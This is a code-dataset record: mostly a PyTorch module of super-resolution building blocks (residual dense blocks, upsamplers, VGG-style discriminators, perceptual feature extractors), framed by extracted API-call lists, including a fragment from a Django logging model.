"django.contrib.auth.get_user_model",
"django.db.models.BooleanField",
"django.db.models.GenericIPAddressField",
"django.db.models.DateTimeField"
] |
[((138, 154), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (152, 154), False, 'from django.contrib.auth import get_user_model\n'), ((1512, 1582), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE', 'related_name': '"""logs"""'}), "(User, on_delete=models.CASCADE, related_name='logs')\n", (1529, 1582), False, 'from django.db import models\n'), ((1618, 1663), 'django.db.models.CharField', 'models.CharField', (['"""Descriรงรฃo"""'], {'max_length': '(256)'}), "('Descriรงรฃo', max_length=256)\n", (1634, 1663), False, 'from django.db import models\n'), ((1677, 1715), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', (['"""Origem"""'], {}), "('Origem')\n", (1705, 1715), False, 'from django.db import models\n'), ((1730, 1758), 'django.db.models.TextField', 'models.TextField', (['"""Detalhes"""'], {}), "('Detalhes')\n", (1746, 1758), False, 'from django.db import models\n'), ((1885, 1913), 'django.db.models.DateTimeField', 'models.DateTimeField', (['"""Data"""'], {}), "('Data')\n", (1905, 1913), False, 'from django.db import models\n'), ((1926, 1986), 'django.db.models.CharField', 'models.CharField', (['"""Level"""'], {'max_length': '(16)', 'choices': 'LOG_LEVELS'}), "('Level', max_length=16, choices=LOG_LEVELS)\n", (1942, 1986), False, 'from django.db import models\n'), ((1997, 2065), 'django.db.models.CharField', 'models.CharField', (['"""Ambiene"""'], {'max_length': '(16)', 'choices': 'LOG_ENVIRONMENTS'}), "('Ambiene', max_length=16, choices=LOG_ENVIRONMENTS)\n", (2013, 2065), False, 'from django.db import models\n'), ((2081, 2128), 'django.db.models.BooleanField', 'models.BooleanField', (['"""Arquivado"""'], {'default': '(False)'}), "('Arquivado', default=False)\n", (2100, 2128), False, 'from django.db import models\n'), ((2147, 2186), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (2167, 2186), False, 'from django.db import models\n'), ((2204, 2239), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (2224, 2239), False, 'from django.db import models\n'), ((1851, 1871), 'django.core.validators.MinValueValidator', 'MinValueValidator', (['(1)'], {}), '(1)\n', (1868, 1871), False, 'from django.core.validators import MinValueValidator\n')]
|
import math
import torch
import torch.nn as nn
from collections import OrderedDict
import torchvision
from torch.nn.utils import spectral_norm
####################
# Basic blocks
####################
def act(act_type, inplace=True, neg_slope=0.2, n_prelu=1):
# helper selecting activation
# neg_slope: for leakyrelu and init of prelu
# n_prelu: for p_relu num_parameters
act_type = act_type.lower()
if act_type == 'relu':
layer = nn.ReLU(inplace)
elif act_type == 'leakyrelu':
layer = nn.LeakyReLU(neg_slope, inplace)
elif act_type == 'prelu':
layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)
else:
raise NotImplementedError('activation layer [%s] is not found' % act_type)
return layer
def norm(norm_type, nc):
# helper selecting normalization layer
norm_type = norm_type.lower()
if norm_type == 'batch':
layer = nn.BatchNorm2d(nc, affine=True)
elif norm_type == 'instance':
layer = nn.InstanceNorm2d(nc, affine=False)
else:
raise NotImplementedError('normalization layer [%s] is not found' % norm_type)
return layer
def pad(pad_type, padding):
# helper selecting padding layer
# if padding is 'zero', do by conv layers
pad_type = pad_type.lower()
if padding == 0:
return None
if pad_type == 'reflect':
layer = nn.ReflectionPad2d(padding)
elif pad_type == 'replicate':
layer = nn.ReplicationPad2d(padding)
else:
raise NotImplementedError('padding layer [%s] is not implemented' % pad_type)
return layer
def get_valid_padding(kernel_size, dilation):
kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)
padding = (kernel_size - 1) // 2
return padding
class ConcatBlock(nn.Module):
# Concat the output of a submodule to its input
def __init__(self, submodule):
super(ConcatBlock, self).__init__()
self.sub = submodule
def forward(self, x):
output = torch.cat((x, self.sub(x)), dim=1)
return output
def __repr__(self):
tmpstr = 'Identity .. \n|'
modstr = self.sub.__repr__().replace('\n', '\n|')
tmpstr = tmpstr + modstr
return tmpstr
class ShortcutBlock(nn.Module):
# Elementwise sum the output of a submodule to its input
def __init__(self, submodule):
super(ShortcutBlock, self).__init__()
self.sub = submodule
def forward(self, x):
output = x + self.sub(x)
return output
def __repr__(self):
tmpstr = 'Identity + \n|'
modstr = self.sub.__repr__().replace('\n', '\n|')
tmpstr = tmpstr + modstr
return tmpstr
def sequential(*args):
# Flatten Sequential. It unwraps nn.Sequential.
if len(args) == 1:
if isinstance(args[0], OrderedDict):
raise NotImplementedError('sequential does not support OrderedDict input.')
return args[0] # No sequential is needed.
modules = []
for module in args:
if isinstance(module, nn.Sequential):
for submodule in module.children():
modules.append(submodule)
elif isinstance(module, nn.Module):
modules.append(module)
return nn.Sequential(*modules)
def conv_block(in_nc, out_nc, kernel_size, stride=1, dilation=1, groups=1, bias=True,
pad_type='zero', norm_type=None, act_type='relu', mode='CNA'):
"""
Conv layer with padding, normalization, activation
mode: CNA --> Conv -> Norm -> Act
NAC --> Norm -> Act --> Conv (Identity Mappings in Deep Residual Networks, ECCV16)
"""
assert mode in ['CNA', 'NAC', 'CNAC'], 'Wong conv mode [%s]' % mode
padding = get_valid_padding(kernel_size, dilation)
p = pad(pad_type, padding) if pad_type and pad_type != 'zero' else None
padding = padding if pad_type == 'zero' else 0
c = nn.Conv2d(in_nc, out_nc, kernel_size=kernel_size, stride=stride, padding=padding, \
dilation=dilation, bias=bias, groups=groups)
a = act(act_type) if act_type else None
if 'CNA' in mode:
n = norm(norm_type, out_nc) if norm_type else None
return sequential(p, c, n, a)
elif mode == 'NAC':
if norm_type is None and act_type is not None:
a = act(act_type, inplace=False)
# Important!
# input----ReLU(inplace)----Conv--+----output
# |________________________|
# inplace ReLU will modify the input, therefore wrong output
n = norm(norm_type, in_nc) if norm_type else None
return sequential(n, a, p, c)
####################
# Useful blocks
####################
class ResNetBlock(nn.Module):
"""
ResNet Block, 3-3 style
with extra residual scaling used in EDSR
(Enhanced Deep Residual Networks for Single Image Super-Resolution, CVPRW 17)
"""
def __init__(self, in_nc, mid_nc, out_nc, kernel_size=3, stride=1, dilation=1, groups=1, \
bias=True, pad_type='zero', norm_type=None, act_type='relu', mode='CNA', res_scale=1):
super(ResNetBlock, self).__init__()
conv0 = conv_block(in_nc, mid_nc, kernel_size, stride, dilation, groups, bias, pad_type, \
norm_type, act_type, mode)
if mode == 'CNA':
act_type = None
if mode == 'CNAC': # Residual path: |-CNAC-|
act_type = None
norm_type = None
conv1 = conv_block(mid_nc, out_nc, kernel_size, stride, dilation, groups, bias, pad_type, \
norm_type, act_type, mode)
# if in_nc != out_nc:
# self.project = conv_block(in_nc, out_nc, 1, stride, dilation, 1, bias, pad_type, \
# None, None)
# print('Need a projecter in ResNetBlock.')
# else:
# self.project = lambda x:x
self.res = sequential(conv0, conv1)
self.res_scale = res_scale
def forward(self, x):
res = self.res(x).mul(self.res_scale)
return x + res
class ResidualDenseBlock_5C(nn.Module):
"""
Residual Dense Block
style: 5 convs
The core module of paper: (Residual Dense Network for Image Super-Resolution, CVPR 18)
"""
def __init__(self, nc, kernel_size=3, gc=32, stride=1, bias=True, pad_type='zero', \
norm_type=None, act_type='leakyrelu', mode='CNA'):
super(ResidualDenseBlock_5C, self).__init__()
# gc: growth channel, i.e. intermediate channels
self.conv1 = conv_block(nc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
self.conv2 = conv_block(nc + gc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
self.conv3 = conv_block(nc + 2 * gc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
self.conv4 = conv_block(nc + 3 * gc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
if mode == 'CNA':
last_act = None
else:
last_act = act_type
self.conv5 = conv_block(nc + 4 * gc, nc, 3, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=last_act, mode=mode)
def forward(self, x):
x1 = self.conv1(x)
x2 = self.conv2(torch.cat((x, x1), 1))
x3 = self.conv3(torch.cat((x, x1, x2), 1))
x4 = self.conv4(torch.cat((x, x1, x2, x3), 1))
x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))
return x5.mul(0.2) + x
class RRDB(nn.Module):
"""
Residual in Residual Dense Block
"""
def __init__(self, nc, kernel_size=3, gc=32, stride=1, bias=True, pad_type='zero', \
norm_type=None, act_type='leakyrelu', mode='CNA'):
super(RRDB, self).__init__()
self.RDB1 = ResidualDenseBlock_5C(nc, kernel_size, gc, stride, bias, pad_type, \
norm_type, act_type, mode)
self.RDB2 = ResidualDenseBlock_5C(nc, kernel_size, gc, stride, bias, pad_type, \
norm_type, act_type, mode)
self.RDB3 = ResidualDenseBlock_5C(nc, kernel_size, gc, stride, bias, pad_type, \
norm_type, act_type, mode)
def forward(self, x):
out = self.RDB1(x)
out = self.RDB2(out)
out = self.RDB3(out)
return out.mul(0.2) + x
####################
# Upsampler
####################
def pixelshuffle_block(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True,
pad_type='zero', norm_type=None, act_type='relu'):
"""
Pixel shuffle layer
(Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional
Neural Network, CVPR17)
"""
conv = conv_block(in_nc, out_nc * (upscale_factor ** 2), kernel_size, stride, bias=bias,
pad_type=pad_type, norm_type=None, act_type=None)
pixel_shuffle = nn.PixelShuffle(upscale_factor)
n = norm(norm_type, out_nc) if norm_type else None
a = act(act_type) if act_type else None
return sequential(conv, pixel_shuffle, n, a)
def upconv_blcok(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True,
pad_type='zero', norm_type=None, act_type='relu', mode='nearest'):
# Up conv
# described in https://distill.pub/2016/deconv-checkerboard/
upsample = nn.Upsample(scale_factor=upscale_factor, mode=mode)
conv = conv_block(in_nc, out_nc, kernel_size, stride, bias=bias,
pad_type=pad_type, norm_type=norm_type, act_type=act_type)
return sequential(upsample, conv)
class RRDB_Net(nn.Module):
def __init__(self, in_nc, out_nc, nf, nb, gc=32, upscale=4, norm_type=None, act_type='leakyrelu', \
mode='CNA', res_scale=1, upsample_mode='upconv'):
super(RRDB_Net, self).__init__()
n_upscale = int(math.log(upscale, 2))
if upscale == 3:
n_upscale = 1
fea_conv = conv_block(in_nc, nf, kernel_size=3, norm_type=None, act_type=None)
rb_blocks = [RRDB(nf, kernel_size=3, gc=32, stride=1, bias=True, pad_type='zero', \
norm_type=norm_type, act_type=act_type, mode='CNA') for _ in range(nb)]
LR_conv = conv_block(nf, nf, kernel_size=3, norm_type=norm_type, act_type=None, mode=mode)
if upsample_mode == 'upconv':
upsample_block = upconv_blcok
elif upsample_mode == 'pixelshuffle':
upsample_block = pixelshuffle_block
else:
raise NotImplementedError('upsample mode [%s] is not found' % upsample_mode)
if upscale == 3:
upsampler = upsample_block(nf, nf, 3, act_type=act_type)
else:
upsampler = [upsample_block(nf, nf, act_type=act_type) for _ in range(n_upscale)]
HR_conv0 = conv_block(nf, nf, kernel_size=3, norm_type=None, act_type=act_type)
HR_conv1 = conv_block(nf, out_nc, kernel_size=3, norm_type=None, act_type=None)
self.model = sequential(fea_conv, ShortcutBlock(sequential(*rb_blocks, LR_conv)), \
*upsampler, HR_conv0, HR_conv1)
def forward(self, x):
x = self.model(x)
return x
####################
# Discriminator
####################
# VGG style Discriminator with input size 128*128
class Discriminator_VGG_128(nn.Module):
def __init__(self, in_nc, base_nf=64, norm_type='batch', act_type='leakyrelu', mode='CNA'):
super(Discriminator_VGG_128, self).__init__()
# features
# hxw, c
# 128, 64
conv0 = conv_block(in_nc, base_nf, kernel_size=3, norm_type=None, act_type=act_type, \
mode=mode)
conv1 = conv_block(base_nf, base_nf, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 64, 64
conv2 = conv_block(base_nf, base_nf * 2, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv3 = conv_block(base_nf * 2, base_nf * 2, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 32, 128
conv4 = conv_block(base_nf * 2, base_nf * 4, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv5 = conv_block(base_nf * 4, base_nf * 4, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 16, 256
conv6 = conv_block(base_nf * 4, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv7 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 8, 512
conv8 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv9 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 4, 512
self.features = sequential(conv0, conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, \
conv9)
# classifier
self.classifier = nn.Sequential(
nn.Linear(512 * 4 * 4, 100), nn.LeakyReLU(0.2, True), nn.Linear(100, 1))
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
# VGG style Discriminator with input size 128*128, Spectral Normalization
class Discriminator_VGG_128_SN(nn.Module):
def __init__(self):
super(Discriminator_VGG_128_SN, self).__init__()
# features
# hxw, c
# 128, 64
self.lrelu = nn.LeakyReLU(0.2, True)
self.conv0 = spectral_norm(nn.Conv2d(3, 64, 3, 1, 1))
self.conv1 = spectral_norm(nn.Conv2d(64, 64, 4, 2, 1))
# 64, 64
self.conv2 = spectral_norm(nn.Conv2d(64, 128, 3, 1, 1))
self.conv3 = spectral_norm(nn.Conv2d(128, 128, 4, 2, 1))
# 32, 128
self.conv4 = spectral_norm(nn.Conv2d(128, 256, 3, 1, 1))
self.conv5 = spectral_norm(nn.Conv2d(256, 256, 4, 2, 1))
# 16, 256
self.conv6 = spectral_norm(nn.Conv2d(256, 512, 3, 1, 1))
self.conv7 = spectral_norm(nn.Conv2d(512, 512, 4, 2, 1))
# 8, 512
self.conv8 = spectral_norm(nn.Conv2d(512, 512, 3, 1, 1))
self.conv9 = spectral_norm(nn.Conv2d(512, 512, 4, 2, 1))
# 4, 512
# classifier
self.linear0 = spectral_norm(nn.Linear(512 * 4 * 4, 100))
self.linear1 = spectral_norm(nn.Linear(100, 1))
def forward(self, x):
x = self.lrelu(self.conv0(x))
x = self.lrelu(self.conv1(x))
x = self.lrelu(self.conv2(x))
x = self.lrelu(self.conv3(x))
x = self.lrelu(self.conv4(x))
x = self.lrelu(self.conv5(x))
x = self.lrelu(self.conv6(x))
x = self.lrelu(self.conv7(x))
x = self.lrelu(self.conv8(x))
x = self.lrelu(self.conv9(x))
x = x.view(x.size(0), -1)
x = self.lrelu(self.linear0(x))
x = self.linear1(x)
return x
class Discriminator_VGG_96(nn.Module):
def __init__(self, in_nc, base_nf=64, norm_type='batch', act_type='leakyrelu', mode='CNA'):
super(Discriminator_VGG_96, self).__init__()
# features
# hxw, c
# 96, 64
conv0 = conv_block(in_nc, base_nf, kernel_size=3, norm_type=None, act_type=act_type, \
mode=mode)
conv1 = conv_block(base_nf, base_nf, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 48, 64
conv2 = conv_block(base_nf, base_nf * 2, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv3 = conv_block(base_nf * 2, base_nf * 2, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 24, 128
conv4 = conv_block(base_nf * 2, base_nf * 4, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv5 = conv_block(base_nf * 4, base_nf * 4, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 12, 256
conv6 = conv_block(base_nf * 4, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv7 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 6, 512
conv8 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv9 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 3, 512
self.features = sequential(conv0, conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, \
conv9)
# classifier
self.classifier = nn.Sequential(
nn.Linear(512 * 3 * 3, 100), nn.LeakyReLU(0.2, True), nn.Linear(100, 1))
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
class Discriminator_VGG_192(nn.Module):
def __init__(self, in_nc, base_nf=64, norm_type='batch', act_type='leakyrelu', mode='CNA'):
super(Discriminator_VGG_192, self).__init__()
# features
# hxw, c
# 192, 64
conv0 = conv_block(in_nc, base_nf, kernel_size=3, norm_type=None, act_type=act_type, \
mode=mode)
conv1 = conv_block(base_nf, base_nf, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 96, 64
conv2 = conv_block(base_nf, base_nf * 2, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv3 = conv_block(base_nf * 2, base_nf * 2, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 48, 128
conv4 = conv_block(base_nf * 2, base_nf * 4, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv5 = conv_block(base_nf * 4, base_nf * 4, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 24, 256
conv6 = conv_block(base_nf * 4, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv7 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 12, 512
conv8 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv9 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 6, 512
conv10 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv11 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 3, 512
self.features = sequential(conv0, conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, \
conv9, conv10, conv11)
# classifier
self.classifier = nn.Sequential(
nn.Linear(512 * 3 * 3, 100), nn.LeakyReLU(0.2, True), nn.Linear(100, 1))
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
####################
# Perceptual Network
####################
# Assume input range is [0, 1]
class VGGFeatureExtractor(nn.Module):
def __init__(self,
feature_layer=34,
use_bn=False,
use_input_norm=True,
device=torch.device('cpu')):
super(VGGFeatureExtractor, self).__init__()
if use_bn:
model = torchvision.models.vgg19_bn(pretrained=True)
else:
model = torchvision.models.vgg19(pretrained=True)
self.use_input_norm = use_input_norm
if self.use_input_norm:
mean = torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1).to(device)
# [0.485-1, 0.456-1, 0.406-1] if input in range [-1,1]
std = torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1).to(device)
# [0.229*2, 0.224*2, 0.225*2] if input in range [-1,1]
self.register_buffer('mean', mean)
self.register_buffer('std', std)
self.features = nn.Sequential(*list(model.features.children())[:(feature_layer + 1)])
# No need to BP to variable
for k, v in self.features.named_parameters():
v.requires_grad = False
def forward(self, x):
if self.use_input_norm:
x = (x - self.mean) / self.std
output = self.features(x)
return output
# Assume input range is [0, 1]
class ResNet101FeatureExtractor(nn.Module):
def __init__(self, use_input_norm=True, device=torch.device('cpu')):
super(ResNet101FeatureExtractor, self).__init__()
model = torchvision.models.resnet101(pretrained=True)
self.use_input_norm = use_input_norm
if self.use_input_norm:
mean = torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1).to(device)
# [0.485-1, 0.456-1, 0.406-1] if input in range [-1,1]
std = torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1).to(device)
# [0.229*2, 0.224*2, 0.225*2] if input in range [-1,1]
self.register_buffer('mean', mean)
self.register_buffer('std', std)
self.features = nn.Sequential(*list(model.children())[:8])
# No need to BP to variable
for k, v in self.features.named_parameters():
v.requires_grad = False
def forward(self, x):
if self.use_input_norm:
x = (x - self.mean) / self.std
output = self.features(x)
return output
class MINCNet(nn.Module):
def __init__(self):
super(MINCNet, self).__init__()
self.ReLU = nn.ReLU(True)
self.conv11 = nn.Conv2d(3, 64, 3, 1, 1)
self.conv12 = nn.Conv2d(64, 64, 3, 1, 1)
self.maxpool1 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv21 = nn.Conv2d(64, 128, 3, 1, 1)
self.conv22 = nn.Conv2d(128, 128, 3, 1, 1)
self.maxpool2 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv31 = nn.Conv2d(128, 256, 3, 1, 1)
self.conv32 = nn.Conv2d(256, 256, 3, 1, 1)
self.conv33 = nn.Conv2d(256, 256, 3, 1, 1)
self.maxpool3 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv41 = nn.Conv2d(256, 512, 3, 1, 1)
self.conv42 = nn.Conv2d(512, 512, 3, 1, 1)
self.conv43 = nn.Conv2d(512, 512, 3, 1, 1)
self.maxpool4 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv51 = nn.Conv2d(512, 512, 3, 1, 1)
self.conv52 = nn.Conv2d(512, 512, 3, 1, 1)
self.conv53 = nn.Conv2d(512, 512, 3, 1, 1)
def forward(self, x):
out = self.ReLU(self.conv11(x))
out = self.ReLU(self.conv12(out))
out = self.maxpool1(out)
out = self.ReLU(self.conv21(out))
out = self.ReLU(self.conv22(out))
out = self.maxpool2(out)
out = self.ReLU(self.conv31(out))
out = self.ReLU(self.conv32(out))
out = self.ReLU(self.conv33(out))
out = self.maxpool3(out)
out = self.ReLU(self.conv41(out))
out = self.ReLU(self.conv42(out))
out = self.ReLU(self.conv43(out))
out = self.maxpool4(out)
out = self.ReLU(self.conv51(out))
out = self.ReLU(self.conv52(out))
out = self.conv53(out)
return out
# Assume input range is [0, 1]
class MINCFeatureExtractor(nn.Module):
def __init__(self, feature_layer=34, use_bn=False, use_input_norm=True, \
device=torch.device('cpu')):
super(MINCFeatureExtractor, self).__init__()
self.features = MINCNet()
self.features.load_state_dict(
torch.load('../experiments/pretrained_models/VGG16minc_53.pth'), strict=True)
self.features.eval()
# No need to BP to variable
for k, v in self.features.named_parameters():
v.requires_grad = False
def forward(self, x):
output = self.features(x)
return output
def define_F(device, use_bn=False):
if use_bn:
feature_layer = 49
else:
feature_layer = 34
netF = VGGFeatureExtractor(feature_layer=feature_layer, use_bn=use_bn, \
use_input_norm=True, device=device)
netF.eval() # No need to train
return netF
|
[
"torchvision.models.vgg19",
"torch.nn.InstanceNorm2d",
"torch.cat",
"torch.device",
"torch.nn.ReflectionPad2d",
"torch.load",
"torch.nn.Upsample",
"torch.Tensor",
"torch.nn.Linear",
"math.log",
"torchvision.models.resnet101",
"torch.nn.PixelShuffle",
"torch.nn.Conv2d",
"torch.nn.BatchNorm2d",
"torch.nn.MaxPool2d",
"torch.nn.LeakyReLU",
"torch.nn.PReLU",
"torch.nn.ReLU",
"torchvision.models.vgg19_bn",
"torch.nn.Sequential",
"torch.nn.ReplicationPad2d"
] |
[((3246, 3269), 'torch.nn.Sequential', 'nn.Sequential', (['*modules'], {}), '(*modules)\n', (3259, 3269), True, 'import torch.nn as nn\n'), ((3899, 4030), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_nc', 'out_nc'], {'kernel_size': 'kernel_size', 'stride': 'stride', 'padding': 'padding', 'dilation': 'dilation', 'bias': 'bias', 'groups': 'groups'}), '(in_nc, out_nc, kernel_size=kernel_size, stride=stride, padding=\n padding, dilation=dilation, bias=bias, groups=groups)\n', (3908, 4030), True, 'import torch.nn as nn\n'), ((9283, 9314), 'torch.nn.PixelShuffle', 'nn.PixelShuffle', (['upscale_factor'], {}), '(upscale_factor)\n', (9298, 9314), True, 'import torch.nn as nn\n'), ((9730, 9781), 'torch.nn.Upsample', 'nn.Upsample', ([], {'scale_factor': 'upscale_factor', 'mode': 'mode'}), '(scale_factor=upscale_factor, mode=mode)\n', (9741, 9781), True, 'import torch.nn as nn\n'), ((461, 477), 'torch.nn.ReLU', 'nn.ReLU', (['inplace'], {}), '(inplace)\n', (468, 477), True, 'import torch.nn as nn\n'), ((915, 946), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['nc'], {'affine': '(True)'}), '(nc, affine=True)\n', (929, 946), True, 'import torch.nn as nn\n'), ((1379, 1406), 'torch.nn.ReflectionPad2d', 'nn.ReflectionPad2d', (['padding'], {}), '(padding)\n', (1397, 1406), True, 'import torch.nn as nn\n'), ((14261, 14284), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (14273, 14284), True, 'import torch.nn as nn\n'), ((20941, 20960), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (20953, 20960), False, 'import torch\n'), ((22149, 22168), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (22161, 22168), False, 'import torch\n'), ((22245, 22290), 'torchvision.models.resnet101', 'torchvision.models.resnet101', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (22273, 22290), False, 'import torchvision\n'), ((23222, 23235), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (23229, 23235), True, 'import torch.nn as nn\n'), ((23258, 23283), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(64)', '(3)', '(1)', '(1)'], {}), '(3, 64, 3, 1, 1)\n', (23267, 23283), True, 'import torch.nn as nn\n'), ((23306, 23332), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3)', '(1)', '(1)'], {}), '(64, 64, 3, 1, 1)\n', (23315, 23332), True, 'import torch.nn as nn\n'), ((23357, 23409), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (23369, 23409), True, 'import torch.nn as nn\n'), ((23432, 23459), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(128)', '(3)', '(1)', '(1)'], {}), '(64, 128, 3, 1, 1)\n', (23441, 23459), True, 'import torch.nn as nn\n'), ((23482, 23510), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(128)', '(3)', '(1)', '(1)'], {}), '(128, 128, 3, 1, 1)\n', (23491, 23510), True, 'import torch.nn as nn\n'), ((23535, 23587), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (23547, 23587), True, 'import torch.nn as nn\n'), ((23610, 23638), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)', '(3)', '(1)', '(1)'], {}), '(128, 256, 3, 1, 1)\n', (23619, 23638), True, 'import torch.nn as nn\n'), ((23661, 23689), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3)', '(1)', '(1)'], {}), '(256, 256, 3, 1, 1)\n', (23670, 23689), True, 'import torch.nn as nn\n'), ((23712, 23740), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3)', '(1)', '(1)'], {}), '(256, 256, 3, 1, 1)\n', (23721, 23740), True, 'import torch.nn as nn\n'), ((23765, 23817), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (23777, 23817), True, 'import torch.nn as nn\n'), ((23840, 23868), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(512)', '(3)', '(1)', '(1)'], {}), '(256, 512, 3, 1, 1)\n', (23849, 23868), True, 'import torch.nn as nn\n'), ((23891, 23919), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (23900, 23919), True, 'import torch.nn as nn\n'), ((23942, 23970), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (23951, 23970), True, 'import torch.nn as nn\n'), ((23995, 24047), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (24007, 24047), True, 'import torch.nn as nn\n'), ((24070, 24098), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (24079, 24098), True, 